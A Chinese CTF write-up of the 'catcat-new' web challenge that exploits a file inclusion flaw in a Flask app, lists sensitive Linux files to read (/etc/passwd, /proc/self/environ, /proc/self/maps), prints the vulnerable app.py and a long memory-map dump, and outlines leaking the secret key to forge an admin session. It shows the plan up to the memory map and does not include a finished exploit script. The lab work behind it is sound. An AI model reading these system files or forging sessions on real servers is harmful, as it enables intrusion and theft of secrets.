【攻防世界】Web系列之catcat-new

2024-01-17

CTF / Web

字数统计: 4.6k | 阅读时长≈ 27 分钟

【攻防世界】Web系列之catcat-new

题目环境可以判断出来存在任意文件包含漏洞，无法遍历到flag文件

这里简单列举几个linux常见的敏感文件

/etc/passwd
/proc/self      #当前运行进程
/proc/self/cmdline  #当前进程命令行参数=
/proc/self/men     #当前进程的内存内容
/proc/self/maps    #当前进程的内存映射关系
/proc/self/environ #包含当前进程的环境变量
/proc/self/fd  #包含当前进程打开的文件的内容和路径
/proc/seflf/exe   #获取当前jin'c

使用php://input伪协议尝试写入shell，返回失败，后端可能不是php

查看/proc/self/cmdline当前运行的进程参数行命令，发现使用python启动app.py

app.py可以判断出使用的是Flask框架开发的网站，我们去遍历该app.py文件

这里对输出的app.py文件作了简单处理，得到如下

import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
 __name__,
 static_url_path='/', 
 static_folder='static' 
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh" #随机生成一串字符并在后面添加字符串
if os.path.isfile("/flag"):
 flag = cat("/flag")#导入flag文件
 os.remove("/flag")#删除flag文件

@app.route('/', methods=['GET'])
def index():
 detailtxt = os.listdir('./details/')
 cats_list = []
 for i in detailtxt:
 cats_list.append(i[:i.index('.')])
 
 return render_template("index.html", cats_list=cats_list, cat=cat)



@app.route('/info', methods=["GET", 'POST'])
def info():
 filename = "./details/" + request.args.get('file', "")
 start = request.args.get('start', "0")
 end = request.args.get('end', "0")
 name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
 
 return render_template("detail.html", catname=name, info=cat(filename, start, end))
 


@app.route('/admin', methods=["GET"])
def admin_can_list_root():
 if session.get('admin') == 1:  #当session信息中admin=1在/admin路径下才返回flag
 return flag
 else:
 session['admin'] = 0
 return "NoNoNo"



if __name__ == '__main__':
 app.run(host='0.0.0.0', debug=False, port=5637)

上面的代码基本可以得出解题逻辑：在/admin路径下判断seesion中是否存在admin=1字段，则返回flag文件，随后导入flag文件并删除。所以需要对flask_seesion进行伪造，首先需要获取secret_key，可以在/proc/self/maps里面找到内存数据的映射关系从而寻找secret_key值。

如下为maps数据

56322e390000-56322e391000 r--p 00000000 fd:00 23480232 /usr/local/bin/python3.7
56322e391000-56322e392000 r-xp 00001000 fd:00 23480232 /usr/local/bin/python3.7
56322e392000-56322e393000 r--p 00002000 fd:00 23480232 /usr/local/bin/python3.7
56322e393000-56322e394000 r--p 00002000 fd:00 23480232 /usr/local/bin/python3.7
56322e394000-56322e395000 rw-p 00003000 fd:00 23480232 /usr/local/bin/python3.7
56322eccc000-56322eccd000 ---p 00000000 00:00 0 [heap]
56322eccd000-56322ecd1000 rw-p 00000000 00:00 0 [heap]
7f82072af000-7f820732f000 rw-p 00000000 00:00 0 
7f8207432000-7f8207434000 ---p 00000000 00:00 0 
7f8207434000-7f820753d000 rw-p 00000000 00:00 0 
7f820754a000-7f820754e000 rw-p 00000000 00:00 0 
7f8207554000-7f8207558000 rw-p 00000000 00:00 0 
7f820755c000-7f82076f0000 rw-p 00000000 00:00 0 
7f82076f1000-7f8207774000 rw-p 00000000 00:00 0 
7f8207777000-7f82077bb000 rw-p 00000000 00:00 0 
7f82077bb000-7f82077bd000 r--p 00000000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077bd000-7f82077bf000 r-xp 00002000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077bf000-7f82077c0000 r--p 00004000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077c0000-7f82077c1000 r--p 00004000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077c1000-7f82077c2000 rw-p 00005000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077c2000-7f82077ce000 rw-p 00000000 00:00 0 
7f82077d1000-7f82078c5000 rw-p 00000000 00:00 0 
7f82078c6000-7f8207938000 rw-p 00000000 00:00 0 
7f8207938000-7f820793e000 r--p 00000000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f820793e000-7f8207975000 r-xp 00006000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f8207975000-7f8207981000 r--p 0003d000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f8207981000-7f8207982000 r--p 00048000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f8207982000-7f820798a000 rw-p 00049000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f820798a000-7f8207a15000 rw-p 00000000 00:00 0 
7f8207a15000-7f8207a63000 rw-p 00000000 00:00 0 
7f8207a63000-7f8207a66000 r--p 00000000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207a66000-7f8207a6a000 r-xp 00003000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207a6a000-7f8207b4b000 r--p 00007000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207b4b000-7f8207b4c000 r--p 000e7000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207b4c000-7f8207b69000 rw-p 000e8000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207b69000-7f8207b75000 rw-p 00000000 00:00 0 
7f8207b76000-7f8207c06000 rw-p 00000000 00:00 0 
7f8207c07000-7f8207d33000 rw-p 00000000 00:00 0 
7f8207d33000-7f8207d4f000 r--p 00000000 fd:00 23348864 /lib/libssl.so.1.1
7f8207d4f000-7f8207d8f000 r-xp 0001c000 fd:00 23348864 /lib/libssl.so.1.1
7f8207d8f000-7f8207da7000 r--p 0005c000 fd:00 23348864 /lib/libssl.so.1.1
7f8207da7000-7f8207db0000 r--p 00073000 fd:00 23348864 /lib/libssl.so.1.1
7f8207db0000-7f8207db4000 rw-p 0007c000 fd:00 23348864 /lib/libssl.so.1.1
7f8207db4000-7f8207f85000 rw-p 00000000 00:00 0 
7f8207f86000-7f8208003000 rw-p 00000000 00:00 0 
7f8208004000-7f8208017000 rw-p 00000000 00:00 0 
7f8208017000-7f8208019000 r--p 00000000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f8208019000-7f820801d000 r-xp 00002000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f820801d000-7f820801f000 r--p 00006000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f820801f000-7f8208020000 r--p 00007000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f8208020000-7f8208021000 rw-p 00008000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f8208021000-7f8208026000 rw-p 00000000 00:00 0 
7f8208026000-7f820802b000 r--p 00000000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820802b000-7f8208036000 r-xp 00005000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f8208036000-7f820803b000 r--p 00010000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820803b000-7f820803c000 r--p 00014000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820803c000-7f820803e000 rw-p 00015000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820803e000-7f82080ac000 rw-p 00000000 00:00 0 
7f82080ac000-7f82080ae000 r--p 00000000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080ae000-7f82080b2000 r-xp 00002000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b2000-7f82080b3000 r--p 00006000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b3000-7f82080b4000 r--p 00006000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b4000-7f82080b6000 rw-p 00007000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b6000-7f82080c0000 rw-p 00000000 00:00 0 
7f82080c0000-7f82080c4000 r--p 00000000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080c4000-7f82080cd000 r-xp 00004000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080cd000-7f82080d2000 r--p 0000d000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080d2000-7f82080d3000 r--p 00011000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080d3000-7f82080d8000 rw-p 00012000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080d8000-7f82080dd000 rw-p 00000000 00:00 0 
7f82080de000-7f82080e7000 rw-p 00000000 00:00 0 
7f82080e7000-7f82080e8000 r--p 00000000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080e8000-7f82080e9000 r-xp 00001000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080e9000-7f82080ea000 r--p 00002000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080ea000-7f82080eb000 r--p 00002000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080eb000-7f82080ec000 rw-p 00003000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080ec000-7f820816c000 rw-p 00000000 00:00 0 
7f820816d000-7f82081c5000 rw-p 00000000 00:00 0 
7f82081c6000-7f820835a000 rw-p 00000000 00:00 0 
7f820835a000-7f820835b000 r--p 00000000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835b000-7f820835c000 r-xp 00001000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835c000-7f820835d000 r--p 00002000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835d000-7f820835e000 r--p 00002000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835e000-7f820835f000 rw-p 00003000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835f000-7f82083b6000 rw-p 00000000 00:00 0 
7f82083b6000-7f82083b7000 r--p 00000000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083b7000-7f82083ba000 r-xp 00001000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083ba000-7f82083bb000 r--p 00004000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083bb000-7f82083bc000 r--p 00004000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083bc000-7f82083bd000 rw-p 00005000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083bd000-7f82083be000 r--p 00000000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083be000-7f82083bf000 r-xp 00001000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083bf000-7f82083c0000 r--p 00002000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083c0000-7f82083c1000 r--p 00002000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083c1000-7f82083c2000 rw-p 00003000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083c2000-7f82083c4000 r--p 00000000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083c4000-7f82083d8000 r-xp 00002000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083d8000-7f82083da000 r--p 00016000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083da000-7f82083db000 r--p 00017000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083db000-7f82083dd000 rw-p 00018000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083dd000-7f82083df000 r--p 00000000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083df000-7f82083e6000 r-xp 00002000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083e6000-7f82083e8000 r--p 00009000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083e8000-7f82083e9000 r--p 0000a000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083e9000-7f82083ea000 rw-p 0000b000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083ea000-7f820845f000 r--p 00000000 fd:00 23348863 /lib/libcrypto.so.1.1
7f820845f000-7f82085b6000 r-xp 00075000 fd:00 23348863 /lib/libcrypto.so.1.1
7f82085b6000-7f820863a000 r--p 001cc000 fd:00 23348863 /lib/libcrypto.so.1.1
7f820863a000-7f8208665000 r--p 0024f000 fd:00 23348863 /lib/libcrypto.so.1.1
7f8208665000-7f8208667000 rw-p 0027a000 fd:00 23348863 /lib/libcrypto.so.1.1
7f8208667000-7f820866b000 rw-p 00000000 00:00 0 
7f820866b000-7f820866d000 r--p 00000000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f820866d000-7f8208671000 r-xp 00002000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208671000-7f8208673000 r--p 00006000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208673000-7f8208674000 r--p 00007000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208674000-7f8208675000 rw-p 00008000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208675000-7f8208678000 r--p 00000000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208678000-7f8208680000 r-xp 00003000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208680000-7f8208682000 r--p 0000b000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208682000-7f8208683000 r--p 0000c000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208683000-7f8208685000 rw-p 0000d000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208685000-7f8208688000 r--p 00000000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f8208688000-7f820869b000 r-xp 00003000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f820869b000-7f82086a6000 r--p 00016000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f82086a6000-7f82086a7000 r--p 00020000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f82086a7000-7f82086a8000 rw-p 00021000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f82086a8000-7f82086aa000 r--p 00000000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086aa000-7f82086b3000 r-xp 00002000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b3000-7f82086b5000 r--p 0000b000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b5000-7f82086b6000 r--p 0000c000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b6000-7f82086b7000 rw-p 0000d000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b7000-7f82086f7000 rw-p 00000000 00:00 0 
7f82086f8000-7f820871a000 rw-p 00000000 00:00 0 
7f820871b000-7f8208721000 rw-p 00000000 00:00 0 
7f8208721000-7f820872a000 r--p 00000000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f820872a000-7f8208733000 r-xp 00009000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f8208733000-7f820873a000 r--p 00012000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f820873a000-7f820873b000 r--p 00018000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f820873b000-7f8208740000 rw-p 00019000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f8208740000-7f8208744000 rw-p 00000000 00:00 0 
7f8208744000-7f8208745000 r--p 00000000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208745000-7f8208746000 r-xp 00001000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208746000-7f8208747000 r--p 00002000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208747000-7f8208748000 r--p 00002000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208748000-7f8208749000 rw-p 00003000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208749000-7f8208796000 rw-p 00000000 00:00 0 
7f8208796000-7f8208799000 r--p 00000000 fd:00 23348866 /lib/libz.so.1.2.11
7f8208799000-7f82087a7000 r-xp 00003000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087a7000-7f82087ae000 r--p 00011000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087ae000-7f82087af000 r--p 00017000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087af000-7f82087b0000 rw-p 00018000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087b0000-7f82087b2000 r--p 00000000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b2000-7f82087b5000 r-xp 00002000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b5000-7f82087b7000 r--p 00005000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b7000-7f82087b8000 r--p 00006000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b8000-7f82087ba000 rw-p 00007000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087ba000-7f82087be000 r--p 00000000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087be000-7f82087d3000 r-xp 00004000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087d3000-7f82087d8000 r--p 00019000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087d8000-7f82087d9000 r--p 0001d000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087d9000-7f82087dc000 rw-p 0001e000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087dc000-7f82087e4000 rw-p 00000000 00:00 0 
7f82087e4000-7f82087e7000 r--p 00000000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087e7000-7f82087ed000 r-xp 00003000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087ed000-7f82087f0000 r--p 00009000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087f0000-7f82087f1000 r--p 0000b000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087f1000-7f82087f3000 rw-p 0000c000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087f3000-7f820884e000 rw-p 00000000 00:00 0 
7f820884e000-7f8208850000 r--p 00000000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f8208850000-7f8208857000 r-xp 00002000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f8208857000-7f8208859000 r--p 00009000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f8208859000-7f820885a000 r--p 0000a000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f820885a000-7f820885b000 rw-p 0000b000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f820885b000-7f8208866000 rw-p 00000000 00:00 0 
7f8208866000-7f8208867000 r--p 00000000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f8208867000-7f8208868000 r-xp 00001000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f8208868000-7f8208869000 r--p 00002000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f8208869000-7f820886a000 r--p 00002000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f820886a000-7f820886b000 rw-p 00003000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f820886b000-7f82089ca000 rw-p 00000000 00:00 0 
7f82089ca000-7f82089cb000 r--p 00000000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089cb000-7f82089cc000 r-xp 00001000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089cc000-7f82089cd000 r--p 00002000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089cd000-7f82089ce000 r--p 00002000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089ce000-7f82089d0000 rw-p 00003000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089d0000-7f82089d3000 rw-p 00000000 00:00 0 
7f82089d3000-7f82089d5000 r--p 00000000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089d5000-7f82089d9000 r-xp 00002000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089d9000-7f82089da000 r--p 00006000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089da000-7f82089db000 r--p 00006000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089db000-7f82089dc000 rw-p 00007000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089dc000-7f82089dd000 r--p 00000000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089dd000-7f82089de000 r-xp 00001000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089de000-7f82089df000 r--p 00002000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089df000-7f82089e0000 r--p 00002000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089e0000-7f82089e1000 rw-p 00003000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089e1000-7f8208a7b000 rw-p 00000000 00:00 0 
7f8208a7b000-7f8208a7d000 r--p 00000000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a7d000-7f8208a80000 r-xp 00002000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a80000-7f8208a82000 r--p 00005000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a82000-7f8208a83000 r--p 00006000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a83000-7f8208a85000 rw-p 00007000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a85000-7f8208a87000 r--p 00000000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a87000-7f8208a89000 r-xp 00002000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a89000-7f8208a8a000 r--p 00004000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a8a000-7f8208a8b000 r--p 00004000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a8b000-7f8208a8c000 rw-p 00005000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a8c000-7f8208c6e000 rw-p 00000000 00:00 0 
7f8208c6e000-7f8208ccd000 r--p 00000000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208ccd000-7f8208e68000 r-xp 0005f000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208e68000-7f8208f14000 r--p 001fa000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208f14000-7f8208f1a000 r--p 002a5000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208f1a000-7f8208f82000 rw-p 002ab000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208f82000-7f8208fa3000 rw-p 00000000 00:00 0 
7f8208fa3000-7f8208fb8000 r--p 00000000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8208fb8000-7f8209000000 r-xp 00015000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
